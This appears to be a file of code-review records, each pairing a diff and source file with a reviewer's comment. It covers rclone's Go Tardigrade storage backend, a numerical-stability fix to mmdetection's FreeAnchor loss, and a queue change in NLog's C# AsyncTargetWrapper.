"asia-east-1.tardigrade.io": "121RTSDpyNZVcEU84Ticf2L1ntiuUimbWgfATz21tuvgk3vzoA6@asia-east-1.tardigrade.io:7777",
}
// Register with Fs
func init() {
fs.Register(&fs.RegInfo{
Name: "tardigrade",
Description: "Tardigrade Decentralized Cloud Storage",
NewFs: NewFs,
Config: func(name string, configMapper configmap.Mapper) {
provider, _ := configMapper.Get(fs.ConfigProvider)
config.FileDeleteKey(name, fs.ConfigProvider)
if provider == newProvider {
satelliteString, _ := configMapper.Get("satellite_address")
apiKey, _ := configMapper.Get("api_key")
passphrase, _ := configMapper.Get("passphrase")
// satelliteString contains always default and passphrase can be empty
if apiKey == "" {
return
}
satellite, found := satMap[satelliteString]
if !found {
satellite = satelliteString
}
access, err := uplink.RequestAccessWithPassphrase(context.TODO(), satellite, apiKey, passphrase)
if err != nil {
log.Fatalf("Couldn't create access grant: %v", err)
}
serialziedAccess, err := access.Serialize()
if err != nil {
log.Fatalf("Couldn't serialize access grant: %v", err)
}
configMapper.Set("satellite_address", satellite)
configMapper.Set("access_grant", serialziedAccess)
} else if provider == existingProvider {
config.FileDeleteKey(name, "satellite_address")
config.FileDeleteKey(name, "api_key")
config.FileDeleteKey(name, "passphrase")
} else {
log.Fatalf("Invalid provider type: %s", provider)
}
},
Options: []fs.Option{
{
Name: fs.ConfigProvider,
Help: "Choose an authentication method.",
Required: true,
Default: existingProvider,
Examples: []fs.OptionExample{{
Value: "existing",
Help: "Use an existing access grant.",
}, {
Value: newProvider,
Help: "Create a new access grant from satellite address, API key, and passphrase.",
},
}},
{
Name: "access_grant",
Help: "Access Grant.",
Required: false,
Provider: "existing",
},
{
Name: "satellite_address",
Help: "Satellite Address. Custom satellite address should match the format: `<nodeid>@<address>:<port>`.",
Required: false,
Provider: newProvider,
Default: "us-central-1.tardigrade.io",
Examples: []fs.OptionExample{{
Value: "us-central-1.tardigrade.io",
Help: "US Central 1",
}, {
Value: "europe-west-1.tardigrade.io",
Help: "Europe West 1",
}, {
Value: "asia-east-1.tardigrade.io",
Help: "Asia East 1",
},
},
},
{
Name: "api_key",
Help: "API Key.",
Required: false,
Provider: newProvider,
},
{
Name: "passphrase",
Help: "Encryption Passphrase. To access existing objects enter passphrase used for uploading.",
Required: false,
Provider: newProvider,
},
},
})
}
// Options defines the configuration for this backend
type Options struct {
Access string `config:"access_grant"`
SatelliteAddress string `config:"satellite_address"`
APIKey string `config:"api_key"`
Passphrase string `config:"passphrase"`
}
// Fs represents a remote to Tardigrade
type Fs struct {
name string // the name of the remote
root string // root of the filesystem
opts Options // parsed options
features *fs.Features // optional features
access *uplink.Access // parsed scope
project *uplink.Project // project client
}
// Check the interfaces are satisfied.
var (
_ fs.Fs = &Fs{}
_ fs.ListRer = &Fs{}
_ fs.PutStreamer = &Fs{}
)
// NewFs creates a filesystem backed by Tardigrade.
func NewFs(name, root string, m configmap.Mapper) (_ fs.Fs, err error) {
ctx := context.Background()
// Setup filesystem and connection to Tardigrade
root = norm.NFC.String(root)
root = strings.Trim(root, "/")
f := &Fs{
name: name,
root: root,
}
// Parse config into Options struct
err = configstruct.Set(m, &f.opts)
if err != nil {
return nil, err
}
// Parse access
var access *uplink.Access
if f.opts.Access != "" {
access, err = uplink.ParseAccess(f.opts.Access)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
}
if access == nil && f.opts.SatelliteAddress != "" && f.opts.APIKey != "" && f.opts.Passphrase != "" {
access, err = uplink.RequestAccessWithPassphrase(ctx, f.opts.SatelliteAddress, f.opts.APIKey, f.opts.Passphrase)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
serializedAccess, err := access.Serialize()
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
err = config.SetValueAndSave(f.name, "access_grant", serializedAccess)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
}
if access == nil {
return nil, errors.New("access not found")
}
f.access = access
f.features = (&fs.Features{
BucketBased: true,
BucketBasedRootOK: true,
}).Fill(f)
project, err := f.connect(ctx)
if err != nil {
return nil, err
}
f.project = project
// Root validation needs to check the following: If a bucket path is
// specified and exists, then the object must be a directory.
//
// NOTE: At this point this must return the filesystem object we've
// created so far even if there is an error.
if root != "" {
bucketName, bucketPath := bucket.Split(root)
if bucketName != "" && bucketPath != "" {
_, err = project.StatBucket(ctx, bucketName)
if err != nil {
return f, errors.Wrap(err, "tardigrade: bucket")
}
object, err := project.StatObject(ctx, bucketName, bucketPath)
if err == nil {
if !object.IsPrefix {
// If the root is actually a file we
// need to return the *parent*
// directory of the root instead and an
// error that the original root
// requested is a file.
newRoot := path.Dir(f.root)
if newRoot == "." {
newRoot = ""
}
f.root = newRoot
return f, fs.ErrorIsFile
}
}
}
}
return f, nil
}
// connect opens a connection to Tardigrade.
func (f *Fs) connect(ctx context.Context) (project *uplink.Project, err error) {
fs.Debugf(f, "connecting...")
defer fs.Debugf(f, "connected: %+v", err)
cfg := uplink.Config{}
project, err = cfg.OpenProject(ctx, f.access)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: project")
}
return
}
// absolute computes the absolute bucket name and path from the filesystem root
// and the relative path provided.
func (f *Fs) absolute(relative string) (bucketName, bucketPath string) {
bn, bp := bucket.Split(path.Join(f.root, relative))
// NOTE: Technically libuplink does not care about the encoding. It is
// happy to work with them as opaque byte sequences. However, rclone
// has a test that requires two paths with the same normalized form
// (but different un-normalized forms) to point to the same file. This
// means we have to normalize before we interact with libuplink.
return norm.NFC.String(bn), norm.NFC.String(bp)
}
// Name of the remote (as passed into NewFs)
func (f *Fs) Name() string {
return f.name
}
// Root of the remote (as passed into NewFs)
func (f *Fs) Root() string {
return f.root
}
// String returns a description of the FS
func (f *Fs) String() string {
return fmt.Sprintf("FS sj://%s", f.root)
}
// Precision of the ModTimes in this Fs
func (f *Fs) Precision() time.Duration {
return time.Nanosecond
}
// Hashes returns the supported hash types of the filesystem.
func (f *Fs) Hashes() hash.Set {
return hash.NewHashSet()
}
// Features returns the optional features of this Fs
func (f *Fs) Features() *fs.Features {
return f.features
}
// List the objects and directories in relative into entries. The entries can
// be returned in any order but should be for a complete directory.
//
// relative should be "" to list the root, and should not have trailing
// slashes.
//
// This should return fs.ErrDirNotFound if the directory isn't found.
func (f *Fs) List(ctx context.Context, relative string) (entries fs.DirEntries, err error) {
fs.Debugf(f, "ls ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
defer func() {
if errors.Is(err, uplink.ErrBucketNotFound) {
err = fs.ErrorDirNotFound
}
}()
if bucketName == "" {
if bucketPath != "" {
return nil, fs.ErrorListBucketRequired
}
return f.listBuckets(ctx)
}
return f.listObjects(ctx, relative, bucketName, bucketPath)
}
func (f *Fs) listBuckets(ctx context.Context) (entries fs.DirEntries, err error) {
fs.Debugf(f, "BKT ls")
buckets := f.project.ListBuckets(ctx, nil)
for buckets.Next() {
bucket := buckets.Item()
entries = append(entries, fs.NewDir(bucket.Name, bucket.Created))
}
return entries, buckets.Err()
}
// newDirEntry creates a directory entry from an uplink object.
//
// NOTE: Getting the exact behavior required by rclone is somewhat tricky. The
// path manipulation here is necessary to cover all the different ways the
// filesystem and object could be initialized and combined.
func (f *Fs) newDirEntry(relative, prefix string, object *uplink.Object) fs.DirEntry {
if object.IsPrefix {
// . The entry must include the relative path as its prefix. Depending on
// | what is being listed and how the filesystem root was initialized the
// | relative path may be empty (and so we use path joining here to ensure
// | we don't end up with an empty path segment).
// |
// | . Remove the prefix used during listing.
// | |
// | | . Remove the trailing slash.
// | | |
// v v v
return fs.NewDir(path.Join(relative, object.Key[len(prefix):len(object.Key)-1]), object.System.Created)
}
return newObjectFromUplink(f, relative, object)
}
func (f *Fs) listObjects(ctx context.Context, relative, bucketName, bucketPath string) (entries fs.DirEntries, err error) {
fs.Debugf(f, "OBJ ls ./%s (%q, %q)", relative, bucketName, bucketPath)
opts := &uplink.ListObjectsOptions{
Prefix: newPrefix(bucketPath),
System: true,
Custom: true,
}
fs.Debugf(f, "opts %+v", opts)
objects := f.project.ListObjects(ctx, bucketName, opts)
for objects.Next() {
entries = append(entries, f.newDirEntry(relative, opts.Prefix, objects.Item()))
}
err = objects.Err()
if err != nil {
return nil, err
}
return entries, nil
}
// ListR lists the objects and directories of the Fs starting from dir
// recursively into out.
//
// relative should be "" to start from the root, and should not have trailing
// slashes.
//
// This should return ErrDirNotFound if the directory isn't found.
//
// It should call callback for each tranche of entries read. These need not be
// returned in any particular order. If callback returns an error then the
// listing will stop immediately.
//
// Don't implement this unless you have a more efficient way of listing
// recursively that doing a directory traversal.
func (f *Fs) ListR(ctx context.Context, relative string, callback fs.ListRCallback) (err error) {
fs.Debugf(f, "ls -R ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
defer func() {
if errors.Is(err, uplink.ErrBucketNotFound) {
err = fs.ErrorDirNotFound
}
}()
if bucketName == "" {
if bucketPath != "" {
return fs.ErrorListBucketRequired
}
return f.listBucketsR(ctx, callback)
}
return f.listObjectsR(ctx, relative, bucketName, bucketPath, callback)
}
func (f *Fs) listBucketsR(ctx context.Context, callback fs.ListRCallback) (err error) {
fs.Debugf(f, "BKT ls -R")
buckets := f.project.ListBuckets(ctx, nil)
for buckets.Next() {
bucket := buckets.Item()
err = f.listObjectsR(ctx, bucket.Name, bucket.Name, "", callback)
if err != nil {
return err
}
}
return buckets.Err()
}
func (f *Fs) listObjectsR(ctx context.Context, relative, bucketName, bucketPath string, callback fs.ListRCallback) (err error) {
fs.Debugf(f, "OBJ ls -R ./%s (%q, %q)", relative, bucketName, bucketPath)
opts := &uplink.ListObjectsOptions{
Prefix: newPrefix(bucketPath),
Recursive: true,
System: true,
Custom: true,
}
objects := f.project.ListObjects(ctx, bucketName, opts)
for objects.Next() {
object := objects.Item()
err = callback(fs.DirEntries{f.newDirEntry(relative, opts.Prefix, object)})
if err != nil {
return err
}
}
err = objects.Err()
if err != nil {
return err
}
return nil
}
// NewObject finds the Object at relative. If it can't be found it returns the
// error ErrorObjectNotFound.
func (f *Fs) NewObject(ctx context.Context, relative string) (_ fs.Object, err error) {
fs.Debugf(f, "stat ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
object, err := f.project.StatObject(ctx, bucketName, bucketPath)
if err != nil {
fs.Debugf(f, "err: %+v", err)
if errors.Is(err, uplink.ErrObjectNotFound) {
return nil, fs.ErrorObjectNotFound
}
return nil, err
}
return newObjectFromUplink(f, relative, object), nil
}
// Put in to the remote path with the modTime given of the given size
//
// When called from outside an Fs by rclone, src.Size() will always be >= 0.
// But for unknown-sized objects (indicated by src.Size() == -1), Put should
// either return an error or upload it properly (rather than e.g. calling
// panic).
//
// May create the object even if it returns an error - if so will return the
// object and the error, otherwise will return nil and the error
func (f *Fs) Put(ctx context.Context, in io.Reader, src fs.ObjectInfo, options ...fs.OpenOption) (_ fs.Object, err error) {
fs.Debugf(f, "cp input ./%s # %+v %d", src.Remote(), options, src.Size())
// Reject options we don't support.
for _, option := range options {
if option.Mandatory() {
fs.Errorf(f, "Unsupported mandatory option: %v", option)
return nil, errors.New("unsupported mandatory option")
}
}
bucketName, bucketPath := f.absolute(src.Remote())
upload, err := f.project.UploadObject(ctx, bucketName, bucketPath, nil)
if err != nil {
return nil, err
}
defer func() {
if err != nil {
aerr := upload.Abort()
if aerr != nil {
fs.Errorf(f, "cp input ./%s %+v: %+v", src.Remote(), options, aerr)
}
}
}()
err = upload.SetCustomMetadata(ctx, uplink.CustomMetadata{
"rclone:mtime": src.ModTime(ctx).Format(time.RFC3339Nano),
})
if err != nil {
return nil, err
}
_, err = io.Copy(upload, in)
if err != nil {
err = fserrors.RetryError(err)
fs.Errorf(f, "cp input ./%s %+v: %+v\n", src.Remote(), options, err)
return nil, err
}
err = upload.Commit()
if err != nil {
if errors.Is(err, uplink.ErrBucketNotFound) {
// Rclone assumes the backend will create the bucket if not existing yet.
// Here we create the bucket and return a retry error for rclone to retry the upload.
_, err = f.project.EnsureBucket(ctx, bucketName)
if err != nil {
return nil, err
}
err = fserrors.RetryError(errors.New("bucket was not available, now created, the upload must be retried"))
}
return nil, err
}
return newObjectFromUplink(f, "", upload.Info()), nil
}
// PutStream uploads to the remote path with the modTime given of indeterminate
// size.
//
// May create the object even if it returns an error - if so will return the
// object and the error, otherwise will return nil and the error.
func (f *Fs) PutStream(ctx context.Context, in io.Reader, src fs.ObjectInfo, options ...fs.OpenOption) (_ fs.Object, err error) {
return f.Put(ctx, in, src, options...)
}
// Mkdir makes the directory (container, bucket)
//
// Shouldn't return an error if it already exists
func (f *Fs) Mkdir(ctx context.Context, relative string) (err error) {
fs.Debugf(f, "mkdir -p ./%s", relative)
bucketName, _ := f.absolute(relative)
_, err = f.project.EnsureBucket(ctx, bucketName)
return err
}
// Rmdir removes the directory (container, bucket)
//
// NOTE: Despite code documentation to the contrary, this method should not
// return an error if the directory does not exist.
func (f *Fs) Rmdir(ctx context.Context, relative string) (err error) {
fs.Debugf(f, "rmdir ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
if bucketPath != "" {
// If we can successfully stat it, then it is an object (and not a prefix).
_, err := f.project.StatObject(ctx, bucketName, bucketPath)
if err != nil {
if errors.Is(err, uplink.ErrObjectNotFound) {
// At this point we know it is not an object,
// but we don't know if it is a prefix for one.
//
// We check this by doing a listing and if we
// get any results back, then we know this is a
// valid prefix (which implies the directory is
// not empty).
opts := &uplink.ListObjectsOptions{
Prefix: newPrefix(bucketPath),
System: true,
Custom: true,
}
objects := f.project.ListObjects(ctx, bucketName, opts)
if objects.Next() {
return fs.ErrorDirectoryNotEmpty
}
return objects.Err()
}
return err
}
return fs.ErrorIsFile
}
_, err = f.project.DeleteBucket(ctx, bucketName)
if err != nil {
if errors.Is(err, uplink.ErrBucketNotFound) {
return fs.ErrorDirNotFound
}
if errors.Is(err, uplink.ErrBucketNotEmpty) {
return fs.ErrorDirectoryNotEmpty
}
return err
}
return nil
}
// newPrefix returns a new prefix for listing conforming to the libuplink
// requirements. In particular, libuplink requires a trailing slash for
// listings, but rclone does not always provide one. Further, depending on how
// the path was initially path normalization may have removed it (e.g. a
// trailing slash from the CLI is removed before it ever gets to the backend
// code).
func newPrefix(prefix string) string {
if prefix == "" {
return prefix
}
if prefix[len(prefix)-1] == '/' {
return prefix
}
return prefix + "/"
}
| 1 | 11,195 | That looks fine! You could use `"rclone/"+fs.Version` too if you wanted. BTW does tardigrade use http under the hood? If you were using rclone's http Client then you'd get a User-Agent and you'd also get support for `-vv --dump bodies` and other nice things. | rclone-rclone | go |
@@ -260,6 +260,10 @@ class FreeAnchorRetinaHead(RetinaHead):
Tensor: Negative bag loss in shape (num_img, num_anchors, num_classes).
""" # noqa: E501, W605
prob = cls_prob * (1 - box_prob)
- negative_bag_loss = prob**self.gamma * F.binary_cross_entropy(
- prob, torch.zeros_like(prob), reduction='none')
- return (1 - self.alpha) * negative_bag_loss
+ neg_prob = 1 - prob
+ # There are some cases when neg_prob = 0.
+ # This will cause the neg_prob.log() to be inf without clamp.
+ neg_prob = torch.clamp(neg_prob, min=1e-12)
+ negative_bag_loss = -prob**self.gamma * neg_prob.log()
+ negative_bag_loss = (1 - self.alpha) * negative_bag_loss
+ return negative_bag_loss | 1 | import torch
import torch.nn.functional as F
from mmdet.core import bbox_overlaps
from ..builder import HEADS
from .retina_head import RetinaHead
@HEADS.register_module()
class FreeAnchorRetinaHead(RetinaHead):
"""FreeAnchor RetinaHead used in https://arxiv.org/abs/1909.02466.
Args:
num_classes (int): Number of categories excluding the background
category.
in_channels (int): Number of channels in the input feature map.
stacked_convs (int): Number of conv layers in cls and reg tower.
Default: 4.
conv_cfg (dict): dictionary to construct and config conv layer.
Default: None.
norm_cfg (dict): dictionary to construct and config norm layer.
Default: norm_cfg=dict(type='GN', num_groups=32,
requires_grad=True).
pre_anchor_topk (int): Number of boxes that be token in each bag.
bbox_thr (float): The threshold of the saturated linear function. It is
usually the same with the IoU threshold used in NMS.
gamma (float): Gamma parameter in focal loss.
alpha (float): Alpha parameter in focal loss.
""" # noqa: W605
def __init__(self,
num_classes,
in_channels,
stacked_convs=4,
conv_cfg=None,
norm_cfg=None,
pre_anchor_topk=50,
bbox_thr=0.6,
gamma=2.0,
alpha=0.5,
**kwargs):
super(FreeAnchorRetinaHead,
self).__init__(num_classes, in_channels, stacked_convs, conv_cfg,
norm_cfg, **kwargs)
self.pre_anchor_topk = pre_anchor_topk
self.bbox_thr = bbox_thr
self.gamma = gamma
self.alpha = alpha
def loss(self,
cls_scores,
bbox_preds,
gt_bboxes,
gt_labels,
img_metas,
gt_bboxes_ignore=None):
"""Compute losses of the head.
Args:
cls_scores (list[Tensor]): Box scores for each scale level
Has shape (N, num_anchors * num_classes, H, W)
bbox_preds (list[Tensor]): Box energies / deltas for each scale
level with shape (N, num_anchors * 4, H, W)
gt_bboxes (list[Tensor]): each item are the truth boxes for each
image in [tl_x, tl_y, br_x, br_y] format.
gt_labels (list[Tensor]): class indices corresponding to each box
img_metas (list[dict]): Meta information of each image, e.g.,
image size, scaling factor, etc.
gt_bboxes_ignore (None | list[Tensor]): specify which bounding
boxes can be ignored when computing the loss.
Returns:
dict[str, Tensor]: A dictionary of loss components.
"""
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
assert len(featmap_sizes) == len(self.anchor_generator.base_anchors)
anchor_list, _ = self.get_anchors(featmap_sizes, img_metas)
anchors = [torch.cat(anchor) for anchor in anchor_list]
# concatenate each level
cls_scores = [
cls.permute(0, 2, 3,
1).reshape(cls.size(0), -1, self.cls_out_channels)
for cls in cls_scores
]
bbox_preds = [
bbox_pred.permute(0, 2, 3, 1).reshape(bbox_pred.size(0), -1, 4)
for bbox_pred in bbox_preds
]
cls_scores = torch.cat(cls_scores, dim=1)
bbox_preds = torch.cat(bbox_preds, dim=1)
cls_prob = torch.sigmoid(cls_scores)
box_prob = []
num_pos = 0
positive_losses = []
for _, (anchors_, gt_labels_, gt_bboxes_, cls_prob_,
bbox_preds_) in enumerate(
zip(anchors, gt_labels, gt_bboxes, cls_prob, bbox_preds)):
with torch.no_grad():
if len(gt_bboxes_) == 0:
image_box_prob = torch.zeros(
anchors_.size(0),
self.cls_out_channels).type_as(bbox_preds_)
else:
# box_localization: a_{j}^{loc}, shape: [j, 4]
pred_boxes = self.bbox_coder.decode(anchors_, bbox_preds_)
# object_box_iou: IoU_{ij}^{loc}, shape: [i, j]
object_box_iou = bbox_overlaps(gt_bboxes_, pred_boxes)
# object_box_prob: P{a_{j} -> b_{i}}, shape: [i, j]
t1 = self.bbox_thr
t2 = object_box_iou.max(
dim=1, keepdim=True).values.clamp(min=t1 + 1e-12)
object_box_prob = ((object_box_iou - t1) /
(t2 - t1)).clamp(
min=0, max=1)
# object_cls_box_prob: P{a_{j} -> b_{i}}, shape: [i, c, j]
num_obj = gt_labels_.size(0)
indices = torch.stack([
torch.arange(num_obj).type_as(gt_labels_), gt_labels_
],
dim=0)
object_cls_box_prob = torch.sparse_coo_tensor(
indices, object_box_prob)
# image_box_iou: P{a_{j} \in A_{+}}, shape: [c, j]
"""
from "start" to "end" implement:
image_box_iou = torch.sparse.max(object_cls_box_prob,
dim=0).t()
"""
# start
box_cls_prob = torch.sparse.sum(
object_cls_box_prob, dim=0).to_dense()
indices = torch.nonzero(box_cls_prob, as_tuple=False).t_()
if indices.numel() == 0:
image_box_prob = torch.zeros(
anchors_.size(0),
self.cls_out_channels).type_as(object_box_prob)
else:
nonzero_box_prob = torch.where(
(gt_labels_.unsqueeze(dim=-1) == indices[0]),
object_box_prob[:, indices[1]],
torch.tensor([
0
]).type_as(object_box_prob)).max(dim=0).values
# upmap to shape [j, c]
image_box_prob = torch.sparse_coo_tensor(
indices.flip([0]),
nonzero_box_prob,
size=(anchors_.size(0),
self.cls_out_channels)).to_dense()
# end
box_prob.append(image_box_prob)
# construct bags for objects
match_quality_matrix = bbox_overlaps(gt_bboxes_, anchors_)
_, matched = torch.topk(
match_quality_matrix,
self.pre_anchor_topk,
dim=1,
sorted=False)
del match_quality_matrix
# matched_cls_prob: P_{ij}^{cls}
matched_cls_prob = torch.gather(
cls_prob_[matched], 2,
gt_labels_.view(-1, 1, 1).repeat(1, self.pre_anchor_topk,
1)).squeeze(2)
# matched_box_prob: P_{ij}^{loc}
matched_anchors = anchors_[matched]
matched_object_targets = self.bbox_coder.encode(
matched_anchors,
gt_bboxes_.unsqueeze(dim=1).expand_as(matched_anchors))
loss_bbox = self.loss_bbox(
bbox_preds_[matched],
matched_object_targets,
reduction_override='none').sum(-1)
matched_box_prob = torch.exp(-loss_bbox)
# positive_losses: {-log( Mean-max(P_{ij}^{cls} * P_{ij}^{loc}) )}
num_pos += len(gt_bboxes_)
positive_losses.append(
self.positive_bag_loss(matched_cls_prob, matched_box_prob))
positive_loss = torch.cat(positive_losses).sum() / max(1, num_pos)
# box_prob: P{a_{j} \in A_{+}}
box_prob = torch.stack(box_prob, dim=0)
# negative_loss:
# \sum_{j}{ FL((1 - P{a_{j} \in A_{+}}) * (1 - P_{j}^{bg})) } / n||B||
negative_loss = self.negative_bag_loss(cls_prob, box_prob).sum() / max(
1, num_pos * self.pre_anchor_topk)
# avoid the absence of gradients in regression subnet
# when no ground-truth in a batch
if num_pos == 0:
positive_loss = bbox_preds.sum() * 0
losses = {
'positive_bag_loss': positive_loss,
'negative_bag_loss': negative_loss
}
return losses
def positive_bag_loss(self, matched_cls_prob, matched_box_prob):
"""Compute positive bag loss.
:math:`-log( Mean-max(P_{ij}^{cls} * P_{ij}^{loc}) )`.
:math:`P_{ij}^{cls}`: matched_cls_prob, classification probability of matched samples.
:math:`P_{ij}^{loc}`: matched_box_prob, box probability of matched samples.
Args:
matched_cls_prob (Tensor): Classification probabilty of matched
samples in shape (num_gt, pre_anchor_topk).
matched_box_prob (Tensor): BBox probability of matched samples,
in shape (num_gt, pre_anchor_topk).
Returns:
Tensor: Positive bag loss in shape (num_gt,).
""" # noqa: E501, W605
# bag_prob = Mean-max(matched_prob)
matched_prob = matched_cls_prob * matched_box_prob
weight = 1 / torch.clamp(1 - matched_prob, 1e-12, None)
weight /= weight.sum(dim=1).unsqueeze(dim=-1)
bag_prob = (weight * matched_prob).sum(dim=1)
# positive_bag_loss = -self.alpha * log(bag_prob)
return self.alpha * F.binary_cross_entropy(
bag_prob, torch.ones_like(bag_prob), reduction='none')
def negative_bag_loss(self, cls_prob, box_prob):
"""Compute negative bag loss.
:math:`FL((1 - P_{a_{j} \in A_{+}}) * (1 - P_{j}^{bg}))`.
:math:`P_{a_{j} \in A_{+}}`: Box_probability of matched samples.
:math:`P_{j}^{bg}`: Classification probability of negative samples.
Args:
cls_prob (Tensor): Classification probability, in shape
(num_img, num_anchors, num_classes).
box_prob (Tensor): Box probability, in shape
(num_img, num_anchors, num_classes).
Returns:
Tensor: Negative bag loss in shape (num_img, num_anchors, num_classes).
""" # noqa: E501, W605
prob = cls_prob * (1 - box_prob)
negative_bag_loss = prob**self.gamma * F.binary_cross_entropy(
prob, torch.zeros_like(prob), reduction='none')
return (1 - self.alpha) * negative_bag_loss
| 1 | 21,741 | Adding one line `prob = prob.clamp(min=EPS, max=1-EPS)` already works. | open-mmlab-mmdetection | py |
@@ -118,7 +118,15 @@ namespace NLog.Targets.Wrappers
/// <param name="overflowAction">The action to be taken when the queue overflows.</param>
public AsyncTargetWrapper(Target wrappedTarget, int queueLimit, AsyncTargetWrapperOverflowAction overflowAction)
{
- RequestQueue = new AsyncRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
+#if NETSTANDARD2_0
+ // NetStandard20 includes many optimizations for ConcurrentQueue:
+ // - See: https://blogs.msdn.microsoft.com/dotnet/2017/06/07/performance-improvements-in-net-core/
+ // Net40 ConcurrencyQueue can seem to leak, because it doesn't clear properly on dequeue
+ // - See: https://blogs.msdn.microsoft.com/pfxteam/2012/05/08/concurrentqueuet-holding-on-to-a-few-dequeued-elements/
+ _requestQueue = new ConcurrentRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
+#else
+ _requestQueue = new AsyncRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
+#endif
TimeToSleepBetweenBatches = 50;
BatchSize = 200;
FullBatchSizeWriteLimit = 5; | 1 | //
// Copyright (c) 2004-2018 Jaroslaw Kowalski <[email protected]>, Kim Christensen, Julian Verdurmen
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of Jaroslaw Kowalski nor the names of its
// contributors may be used to endorse or promote products derived from this
// software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
// THE POSSIBILITY OF SUCH DAMAGE.
//
namespace NLog.Targets.Wrappers
{
using System;
using System.ComponentModel;
using System.Threading;
using NLog.Common;
using NLog.Internal;
/// <summary>
/// Provides asynchronous, buffered execution of target writes.
/// </summary>
/// <seealso href="https://github.com/nlog/nlog/wiki/AsyncWrapper-target">Documentation on NLog Wiki</seealso>
/// <remarks>
/// <p>
/// Asynchronous target wrapper allows the logger code to execute more quickly, by queueing
/// messages and processing them in a separate thread. You should wrap targets
/// that spend a non-trivial amount of time in their Write() method with asynchronous
/// target to speed up logging.
/// </p>
/// <p>
/// Because asynchronous logging is quite a common scenario, NLog supports a
/// shorthand notation for wrapping all targets with AsyncWrapper. Just add async="true" to
/// the <targets/> element in the configuration file.
/// </p>
/// <code lang="XML">
/// <![CDATA[
/// <targets async="true">
/// ... your targets go here ...
/// </targets>
/// ]]></code>
/// </remarks>
/// <example>
/// <p>
/// To set up the target in the <a href="config.html">configuration file</a>,
/// use the following syntax:
/// </p>
/// <code lang="XML" source="examples/targets/Configuration File/AsyncWrapper/NLog.config" />
/// <p>
/// The above examples assume just one target and a single rule. See below for
/// a programmatic configuration that's equivalent to the above config file:
/// </p>
/// <code lang="C#" source="examples/targets/Configuration API/AsyncWrapper/Wrapping File/Example.cs" />
/// </example>
[Target("AsyncWrapper", IsWrapper = true)]
public class AsyncTargetWrapper : WrapperTargetBase
{
private readonly object _writeLockObject = new object();
private readonly object _timerLockObject = new object();
private Timer _lazyWriterTimer;
private readonly ReusableAsyncLogEventList _reusableAsyncLogEventList = new ReusableAsyncLogEventList(200);
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
public AsyncTargetWrapper()
: this(null)
{
}
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
/// <param name="name">Name of the target.</param>
/// <param name="wrappedTarget">The wrapped target.</param>
public AsyncTargetWrapper(string name, Target wrappedTarget)
: this(wrappedTarget)
{
Name = name;
}
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
/// <param name="wrappedTarget">The wrapped target.</param>
public AsyncTargetWrapper(Target wrappedTarget)
: this(wrappedTarget, 10000, AsyncTargetWrapperOverflowAction.Discard)
{
}
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
/// <param name="wrappedTarget">The wrapped target.</param>
/// <param name="queueLimit">Maximum number of requests in the queue.</param>
/// <param name="overflowAction">The action to be taken when the queue overflows.</param>
public AsyncTargetWrapper(Target wrappedTarget, int queueLimit, AsyncTargetWrapperOverflowAction overflowAction)
{
RequestQueue = new AsyncRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
TimeToSleepBetweenBatches = 50;
BatchSize = 200;
FullBatchSizeWriteLimit = 5;
WrappedTarget = wrappedTarget;
QueueLimit = queueLimit;
OverflowAction = overflowAction;
}
/// <summary>
/// Gets or sets the number of log events that should be processed in a batch
/// by the lazy writer thread.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(200)]
public int BatchSize { get; set; }
/// <summary>
/// Gets or sets the time in milliseconds to sleep between batches.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(50)]
public int TimeToSleepBetweenBatches { get; set; }
/// <summary>
/// Gets or sets the action to be taken when the lazy writer thread request queue count
/// exceeds the set limit.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue("Discard")]
public AsyncTargetWrapperOverflowAction OverflowAction
{
get => RequestQueue.OnOverflow;
set => RequestQueue.OnOverflow = value;
}
/// <summary>
/// Gets or sets the limit on the number of requests in the lazy writer thread request queue.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(10000)]
public int QueueLimit
{
get => RequestQueue.RequestLimit;
set => RequestQueue.RequestLimit = value;
}
/// <summary>
